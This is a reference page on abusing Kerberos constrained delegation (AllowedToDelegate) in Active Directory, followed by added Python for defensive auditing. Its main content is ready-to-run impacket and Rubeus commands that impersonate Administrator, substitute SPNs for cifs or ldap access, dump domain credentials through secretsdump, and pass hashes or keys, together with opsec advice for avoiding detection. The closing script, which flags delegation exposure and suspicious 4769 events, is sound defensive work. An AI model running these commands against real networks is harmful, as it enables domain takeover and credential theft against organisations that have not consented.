AllowedToDelegate
Source principal has constrained delegation configured (msDS-AllowedToDelegateTo), allowing it to request service tickets on behalf of any user to the listed SPNs and, via sname substitution, to any service on those hosts.
Applies to: User/Computer → Computer
Key: the sname (service name) field of the resulting S4U2proxy ticket sits in the unencrypted part of the ticket and is not integrity-protected, so the requester can substitute any service class (e.g., cifs, host, ldap) on a listed host regardless of what is in the AllowedToDelegateTo list.
Linux Abuse
With Protocol Transition (TrustedToAuthForDelegation flag set)
# Impersonate any user to the configured SPN
getST.py -spn '<spn>' -impersonate Administrator \
-dc-ip <dc-ip> '<domain>/<username>:<password>'
# Pass-the-Hash
getST.py -spn '<spn>' -impersonate Administrator \
-dc-ip <dc-ip> -hashes ':<ntlm-hash>' '<domain>/<username>'
# Pass-the-Key (AES key instead of NTLM hash, for better opsec)
getST.py -spn '<spn>' -impersonate Administrator \
-dc-ip <dc-ip> -aesKey '<aes-key>' '<domain>/<username>'
# Use the ticket (getST.py names the file <impersonated>@<spn with / replaced by _>@<domain>.ccache)
export KRB5CCNAME='Administrator@<service>_<target-computer>.<domain>@<domain>.ccache'
wmiexec.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
secretsdump.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
SPN substitution → pivot to an alternate service on the same host
# Configured SPN: HTTP/<target-computer> → substitute cifs for admin access
getST.py -spn 'cifs/<target-computer>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> '<domain>/<username>:<password>'
# Or request ldap for dcsync if target is DC
getST.py -spn 'ldap/<dc-hostname>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> '<domain>/<username>:<password>'
export KRB5CCNAME=Administrator@ldap_<dc-hostname>.<domain>@<domain>.ccache
secretsdump.py -k -no-pass '<domain>/Administrator@<dc-hostname>.<domain>'
Without Protocol Transition (no TrustedToAuthForDelegation)
# Step 1: Obtain forwardable TGS for serviceA to serviceB (need a ticket for serviceB first)
getST.py -spn 'cifs/<intermediate-host>' -impersonate administrator '<domain>/<serviceB-user>:<password>'
# Step 2: Use forwardable ticket as additional-ticket for S4U2proxy to target
getST.py -spn 'cifs/<target-computer>.<domain>' -impersonate administrator \
-additional-ticket 'administrator@cifs_<intermediate-host>@<domain>.ccache' \
'<domain>/<username>:<password>'
Windows Abuse
Rubeus → with protocol transition (TrustedToAuthForDelegation)
# RC4 hash
Rubeus.exe s4u /user:<username> /rc4:<ntlm-hash> /impersonateuser:Administrator \
/msdsspn:<spn> /ptt
# AES256 key (better opsec)
Rubeus.exe s4u /user:<username> /aes256:<aes-key> /impersonateuser:Administrator \
/msdsspn:<spn> /ptt
# SPN substitution (altservice)
Rubeus.exe s4u /user:<username> /rc4:<ntlm-hash> /impersonateuser:Administrator \
/msdsspn:'HTTP/<target-computer>.<domain>' /altservice:cifs /ptt
Rubeus → without protocol transition (need a ticket first)
# Get TGT for delegating account
Rubeus.exe asktgt /user:<username> /rc4:<ntlm-hash> /outfile:tgt.kirbi
# S4U2self to get user ticket (non-forwardable without TrustedToAuthForDelegation)
# Then S4U2proxy using a forwardable ticket from another account in the chain
Rubeus.exe s4u /ticket:tgt.kirbi /impersonateuser:Administrator \
/msdsspn:<spn> /ptt
After ptt → access target
ls \\<target-computer>.<domain>\c$
Enter-PSSession -ComputerName <target-computer>.<domain>
Enumerate delegation configuration
Get-DomainComputer -TrustedToAuth | Select-Object -Property samaccountname,msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select-Object -Property samaccountname,msds-allowedtodelegateto
Opsec
- The S4U2self + S4U2proxy chain generates Event ID 4769 (Kerberos service ticket request) on the DC
- SPN substitution (altservice) is the key bypass → the substituted sname is not in the ticket's protected portion
- AES256 keys are quieter than RC4 (an RC4 request shows in Event ID 4769 with Ticket Encryption Type 0x17, which defenders commonly alert on)
- Target user must not be in the Protected Users group or have "Account is sensitive and cannot be delegated" set
- Kerberos traffic must flow between the attacker system and the DC → requires domain network access
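The enumeration section above lists which principals have msDS-AllowedToDelegateTo set, and the opsec bullets list what a defender can look for (Event ID 4769, RC4 ticket requests, accounts that lack delegation protection). The following Python is an added example, not code from the original page or from BloodHound, impacket or Rubeus: it takes a constructed snapshot of the relevant AD attributes (the same data Get-DomainComputer -TrustedToAuth or an LDAP query would return) and a few constructed, simplified 4769 records whose field names follow the event's, and shows how a defender would (a) derive the hosts actually exposed by each delegation entry, treating every listed host as fully exposed because of sname substitution, (b) find privileged accounts that are still delegatable, and (c) triage 4769 records that carry a Transited Services value. The userAccountControl bit values are the real AD schema constants; everything else is constructed sample data.

```python
"""Added example (not part of the original page): audit msDS-AllowedToDelegateTo
exposure from an AD attribute snapshot and triage Event ID 4769 records for
delegation-abuse signals. All records below are constructed sample data."""

# userAccountControl bits (values from the AD schema)
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition enabled
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
RC4_HMAC = 0x17                             # 4769 Ticket Encryption Type for RC4

# Constructed snapshot: the attributes a delegation audit needs, simplified.
PRINCIPALS = [
    {"sam": "WEB01$", "uac": TRUSTED_TO_AUTH_FOR_DELEGATION | 0x1000,
     "allowedto": ["HTTP/app01.corp.example", "HTTP/app01.corp.example:8080"],
     "admincount": 0, "memberof": []},
    {"sam": "svc-sql", "uac": 0x200,
     "allowedto": ["MSSQLSvc/db01.corp.example:1433"],
     "admincount": 0, "memberof": []},
    {"sam": "Administrator", "uac": 0x200, "allowedto": [],
     "admincount": 1, "memberof": ["CN=Domain Admins,CN=Users,DC=corp,DC=example"]},
    {"sam": "da-backup", "uac": 0x200 | NOT_DELEGATED, "allowedto": [],
     "admincount": 1, "memberof": ["CN=Protected Users,CN=Users,DC=corp,DC=example"]},
]

# Constructed, simplified Event ID 4769 records. Real events carry more fields;
# "TransitedServices" is populated when the ticket came out of an S4U2proxy chain.
EVENTS = [
    {"AccountName": "Administrator", "ServiceName": "APP01$",
     "TicketEncryptionType": 0x12, "TransitedServices": "HTTP/app01.corp.example"},
    {"AccountName": "jsmith", "ServiceName": "APP01$",
     "TicketEncryptionType": RC4_HMAC, "TransitedServices": "HTTP/app01.corp.example"},
    {"AccountName": "jsmith", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0x12, "TransitedServices": ""},
]


def parse_spn(spn):
    """Split 'class/host[:port]' into (class, host), lower-cased, port dropped."""
    service, _, rest = spn.partition("/")
    host = rest.split(":", 1)[0]
    return service.lower(), host.lower()


def audit_delegation(principals):
    """Per delegating account: is protocol transition on, and which hosts are exposed.
    Because the sname is substitutable, every listed host counts as fully exposed
    (any service on it), not just the service class written in the allow list."""
    findings = {}
    for p in principals:
        if not p["allowedto"]:
            continue
        hosts = sorted({parse_spn(s)[1] for s in p["allowedto"]})
        findings[p["sam"]] = {
            "protocol_transition": bool(p["uac"] & TRUSTED_TO_AUTH_FOR_DELEGATION),
            "exposed_hosts": hosts,
        }
    return findings


def delegatable_privileged(principals):
    """Privileged accounts (adminCount=1) that S4U can still impersonate: neither
    NOT_DELEGATED set nor a member of Protected Users."""
    out = []
    for p in principals:
        if p["admincount"] != 1:
            continue
        protected = bool(p["uac"] & NOT_DELEGATED) or any(
            g.lower().startswith("cn=protected users,") for g in p["memberof"])
        if not protected:
            out.append(p["sam"])
    return out


def triage_4769(events, principals):
    """Return (index, reason) pairs for 4769 records worth a closer look."""
    privileged = {p["sam"] for p in principals if p["admincount"] == 1}
    hits = []
    for i, e in enumerate(events):
        if not e["TransitedServices"]:
            continue  # ordinary TGS request, not an S4U2proxy chain
        if e["AccountName"] in privileged:
            hits.append((i, "S4U2proxy impersonation of a privileged account"))
        if e["TicketEncryptionType"] == RC4_HMAC:
            hits.append((i, "RC4 (0x17) ticket in a delegation chain"))
    return hits


if __name__ == "__main__":
    for sam, f in audit_delegation(PRINCIPALS).items():
        print(f"{sam}: protocol_transition={f['protocol_transition']} "
              f"exposed_hosts={f['exposed_hosts']}")
    print("delegatable privileged accounts:", delegatable_privileged(PRINCIPALS))
    for idx, reason in triage_4769(EVENTS, PRINCIPALS):
        print(f"event {idx}: {reason}")
```

Run as-is against the constructed data: WEB01$ is reported with protocol transition on and app01.corp.example as a fully exposed host even though only HTTP is listed; Administrator is reported as delegatable while da-backup is not; and the two 4769 records with a Transited Services value are flagged, one for impersonating a privileged account and one for the RC4 ticket. Replacing PRINCIPALS with real LDAP output and EVENTS with parsed security-log records is the only change needed for live use.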